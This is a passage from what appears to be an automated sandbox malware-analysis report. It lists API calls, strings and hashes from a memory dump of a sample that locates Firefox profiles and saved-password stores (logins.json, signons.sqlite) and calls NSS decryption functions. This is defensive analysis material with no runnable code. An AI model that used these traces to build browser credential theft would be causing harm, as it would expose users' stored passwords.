                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
                                                                                                                                                                  • memset.MSVCRT ref: 004079D1
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
                                                                                                                                                                  • memset.MSVCRT ref: 00407A23
                                                                                                                                                                  • memset.MSVCRT ref: 00407A3B
                                                                                                                                                                  • memset.MSVCRT ref: 00407A53
                                                                                                                                                                  • memset.MSVCRT ref: 00407A6B
                                                                                                                                                                  • memset.MSVCRT ref: 00407A83
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407A8E
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407A9C
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407ACB
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407AD9
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B08
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B16
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B45
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B53
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B82
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407B90
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                    • Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                    • Part of subcall function 0040744D: memset.MSVCRT ref: 0040748C
                                                                                                                                                                    • Part of subcall function 0040744D: memset.MSVCRT ref: 0040750B
                                                                                                                                                                    • Part of subcall function 0040744D: memset.MSVCRT ref: 00407520
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$memset$AddressProc$CurrentDirectory$LibraryLoad$AttributesByteCharFileHandleModuleMultiWidewcscatwcscpy
                                                                                                                                                                  • String ID: logins.json$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                  • API String ID: 3287676187-2852686199
                                                                                                                                                                  • Opcode ID: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
                                                                                                                                                                  • Instruction ID: 7d0a504a01980ca961e130c4bf0e7e2836c0561e9ae5ad9b50c10663cf81d5b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F91947180811DABEF11EF51DC41A9E77B8FF44319F1004ABF908E2191EB79AA548B9A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411158, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 171COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
                                                                                                                                                                  • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                                                                                                                                  • API String ID: 3014334669-2600475665
                                                                                                                                                                  • Opcode ID: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
                                                                                                                                                                  • Instruction ID: c42e31a804922eed0ec5ba890dd8b4603cdc71837868ac6ae30ebb97505d8267
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D51557290122CAAEB20EB55CD45FDEB7BCAF55344F1040E7B508A2151EF789B848F99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EB6D, Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 274windowregistryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040B5D4: LoadMenuW.USER32 ref: 0040B5DC
                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040EC7A
                                                                                                                                                                  • CreateStatusWindowW.COMCTL32(50000000,Function_0004552C,?,00000101), ref: 0040EC95
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040ECAD
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040ECBC
                                                                                                                                                                  • LoadImageW.USER32 ref: 0040ECC9
                                                                                                                                                                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040ECF3
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040ED00
                                                                                                                                                                  • CreateWindowExW.USER32 ref: 0040ED27
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040EDEF
                                                                                                                                                                  • ShowWindow.USER32(?,?), ref: 0040EE25
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00453928), ref: 0040EE56
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,00453928), ref: 0040EE66
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040EE6D
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040EE7B
                                                                                                                                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040EEC8
                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040EF02
                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040EF15
                                                                                                                                                                    • Part of subcall function 00403D7A: wcslen.MSVCRT ref: 00403D97
                                                                                                                                                                    • Part of subcall function 00403D7A: SendMessageW.USER32(?,00001061,?,?), ref: 00403DBB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$SendWindow$Createwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterShowStatusTempToolbarmemcpy
                                                                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                  • API String ID: 1225797202-2103577948
                                                                                                                                                                  • Opcode ID: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
                                                                                                                                                                  • Instruction ID: 8c9b3575536fccf7ef0877cb0e8d9f23cb5666ec72f10922821c14b88f39767b
                                                                                                                                                                  • Opcode Fuzzy Hash: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
                                                                                                                                                                  • Instruction Fuzzy Hash: B5B1A271540388AFEF11DF64CC89BCA7FA5AF55304F0404BAFA48AF292C7B99544CB69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403768, Relevance: 36.1, APIs: 24, Instructions: 84windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0B9
                                                                                                                                                                    • Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0CE
                                                                                                                                                                    • Part of subcall function 0040E076: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
                                                                                                                                                                    • Part of subcall function 0040E076: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
                                                                                                                                                                    • Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
                                                                                                                                                                    • Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
                                                                                                                                                                    • Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
                                                                                                                                                                    • Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
                                                                                                                                                                    • Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
                                                                                                                                                                    • Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
                                                                                                                                                                    • Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E19F
                                                                                                                                                                    • Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
                                                                                                                                                                    • Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E1BC
                                                                                                                                                                    • Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
                                                                                                                                                                    • Part of subcall function 0040E076: GetSysColor.USER32(0000000F), ref: 0040E1D5
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040377A
                                                                                                                                                                  • LoadIconW.USER32 ref: 00403785
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403796
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040379A
                                                                                                                                                                  • LoadIconW.USER32 ref: 0040379F
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 004037AA
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004037AE
                                                                                                                                                                  • LoadIconW.USER32 ref: 004037B3
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 004037BE
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004037C2
                                                                                                                                                                  • LoadIconW.USER32 ref: 004037C7
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 004037D2
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004037D6
                                                                                                                                                                  • LoadIconW.USER32 ref: 004037DB
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 004037E6
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004037EA
                                                                                                                                                                  • LoadIconW.USER32 ref: 004037EF
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 004037FA
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004037FE
                                                                                                                                                                  • LoadIconW.USER32 ref: 00403803
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 0040380E
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403812
                                                                                                                                                                  • LoadIconW.USER32 ref: 00403817
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 00403822
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconImage$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 715923342-0
                                                                                                                                                                  • Opcode ID: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
                                                                                                                                                                  • Instruction ID: b7e10a9324f3d83bf9194ece928487740f847c1137f1a2c01f1b8e69b6e47de2
                                                                                                                                                                  • Opcode Fuzzy Hash: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
                                                                                                                                                                  • Instruction Fuzzy Hash: 1711F160B857087AFA3137B2DC4BF7B7A5EDF81B85F114414F35D990E0C9E6AC105928
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00443D20, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00443D51
                                                                                                                                                                  • GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00443DD1
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00443DFB
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00443EAB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                  • API String ID: 1223191525-1542517562
                                                                                                                                                                  • Opcode ID: f160691ecdb482a839b0d8bd7ec2443cf0dfcac9d5922b70f5c8bd6361710c8c
                                                                                                                                                                  • Instruction ID: f644ee0d2354bfc8442d092a800b66c1527b1609597f5fb91e8fdc391f94498a
                                                                                                                                                                  • Opcode Fuzzy Hash: f160691ecdb482a839b0d8bd7ec2443cf0dfcac9d5922b70f5c8bd6361710c8c
                                                                                                                                                                  • Instruction Fuzzy Hash: 164133B2900218BAEB04EFA1DD82DDEB7BCAF48704F110517B515A3142DB78EA559BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E076, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040E0B9
                                                                                                                                                                  • memset.MSVCRT ref: 0040E0CE
                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
                                                                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E117
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E122
                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
                                                                                                                                                                  • LoadImageW.USER32 ref: 0040E19F
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
                                                                                                                                                                  • LoadImageW.USER32 ref: 0040E1BC
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 0040E1D5
                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040E1F0
                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040E200
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040E20C
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040E212
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040E22F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 304928396-0
                                                                                                                                                                  • Opcode ID: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
                                                                                                                                                                  • Instruction ID: d1f198460081c9bd407666b3734bdbb6004887ae833e7bd4338906f330e243fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
                                                                                                                                                                  • Instruction Fuzzy Hash: F241E975640704BFEB20AF70DC4AF9777ADFB09705F000829F399A91D1CAF5A8508B29
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406B51, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 198registrytimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00406B72
                                                                                                                                                                    • Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
                                                                                                                                                                  • _wcsnicmp.MSVCRT ref: 00406BE5
                                                                                                                                                                  • memset.MSVCRT ref: 00406C09
                                                                                                                                                                  • memset.MSVCRT ref: 00406C25
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00406C45
                                                                                                                                                                  • wcsrchr.MSVCRT ref: 00406C6C
                                                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000), ref: 00406C9F
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00406CC1
                                                                                                                                                                  • memset.MSVCRT ref: 00406BBF
                                                                                                                                                                    • Part of subcall function 00413EE6: RegEnumKeyExW.ADVAPI32 ref: 00413F09
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00406D07
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                                                                                                                                                  • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                                  • API String ID: 1094916163-2797892316
                                                                                                                                                                  • Opcode ID: 07749401729549ea18023a88aae6b7e086f03ff84713cd47a7d93030012f0eb7
                                                                                                                                                                  • Instruction ID: 3a0c8bae75b73356f025c28445405007b897e2e36fb84af6dfbdfac580efd4a0
                                                                                                                                                                  • Opcode Fuzzy Hash: 07749401729549ea18023a88aae6b7e086f03ff84713cd47a7d93030012f0eb7
                                                                                                                                                                  • Instruction Fuzzy Hash: 9961BBB2D04229AAEF20EBA1CC45BDF77BCFF45344F010476E909F2181EB795A548B59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00414847, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                                                                                  • Opcode ID: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
                                                                                                                                                                  • Instruction ID: 7b6d47d0ae84673c1440bb3f6a45a38d491a9b2de853a8b7013f3412f20213e7
                                                                                                                                                                  • Opcode Fuzzy Hash: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
                                                                                                                                                                  • Instruction Fuzzy Hash: FC31B9B6504305BAF720EA55DD86EAB73BCDBC1714F20406FF214B2182EB7C99858A5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004118EA, Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                  • API String ID: 667068680-2887671607
                                                                                                                                                                  • Opcode ID: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
                                                                                                                                                                  • Instruction ID: 49f1c8a85f5507baf9409120c02bba5f1b3352987f0cf3d6caa0177263683d24
                                                                                                                                                                  • Opcode Fuzzy Hash: d8ef7826caabcaaffc412af8f074007f850e332e68426ef7b20180a0e9148960
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01C8F5D80314BADB216FB1AC8AA053EA5F71C7D3710883BE42452272D778C610CE9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D399, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                  • API String ID: 1607361635-601624466
                                                                                                                                                                  • Opcode ID: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
                                                                                                                                                                  • Instruction ID: 86ecdfe433e0374b5ced7b433421c6295f8700cac4d68a1fbb2313435c6baabf
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c4e98fc668ec826f20e0b002b8e58c954f250be10c1ab6a9c58bcae2153cd4d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6561A171900208EFEF14EF94CC85EAE7B79EF45314F1001AAF815A72D2DB38AA55CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D9D6, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                                                  • Opcode ID: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
                                                                                                                                                                  • Instruction ID: d19b445dff31b0d86a25f5297df5c333c47444227bfe33656549cbc54b746d40
                                                                                                                                                                  • Opcode Fuzzy Hash: ca54b146358acc6312ccae977809877886edf0d219006698e2b397220b1af42e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D4142B1D40219AAEB20EF95CC85FFB737CFF45304F4540ABB918A2191E7389A948F65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BD50, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040BD76
                                                                                                                                                                  • memset.MSVCRT ref: 0040BD92
                                                                                                                                                                    • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                    • Part of subcall function 00443D20: GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
                                                                                                                                                                    • Part of subcall function 00443D20: ??2@YAPAXI@Z.MSVCRT ref: 00443D51
                                                                                                                                                                    • Part of subcall function 00443D20: GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
                                                                                                                                                                    • Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
                                                                                                                                                                    • Part of subcall function 00443D20: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
                                                                                                                                                                    • Part of subcall function 00443D20: _snwprintf.MSVCRT ref: 00443DD1
                                                                                                                                                                    • Part of subcall function 00443D20: wcscpy.MSVCRT ref: 00443DFB
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BDD6
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BDE5
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BDF5
                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(0040BEF4,00000004,0040BB24,00000000), ref: 0040BE5A
                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(0040BEF4,00000005,0040BB24,00000000), ref: 0040BE64
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040BE6C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
